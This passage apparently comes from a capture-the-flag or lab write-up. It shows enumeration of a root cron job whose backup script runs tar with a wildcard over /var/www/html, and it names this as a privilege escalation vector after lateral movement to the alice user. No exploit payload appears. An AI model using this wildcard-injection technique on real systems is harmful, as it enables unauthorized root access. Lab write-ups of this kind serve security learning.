Cron
A root cronjob has been identified, and its execution flow was captured. It was also revealed by PEAS at a later stage.
redis@readys:~$ ll /usr/local/bin/backup.sh
4.0K -rwxr-xr-x 1 root root 122 Nov 17 2021 /usr/local/bin/backup.sh
redis@readys:~$ cat /usr/local/bin/backup.sh
#!/bin/bash
cd /var/www/html
if [ $(find . -type f -mmin -3 | wc -l) -gt 0 ]; then
tar -cf /opt/backups/website.tar *
fiThe Bash script looks for files in the /var/www/html directory that are modified less than 3 minutes ago.
If the result is more than 0, it achieves the /var/www/html directory into the /opt/backups/website.tar file using tar
The /var/www/html directory is owned by the alice user.
Now that the lateral movement was made to the alice user, this vector becomes viable
The important bit here is that it uses the wildcard bit(*), to include everything in the /var/www/html directory.
This is a Privilege Escalation vector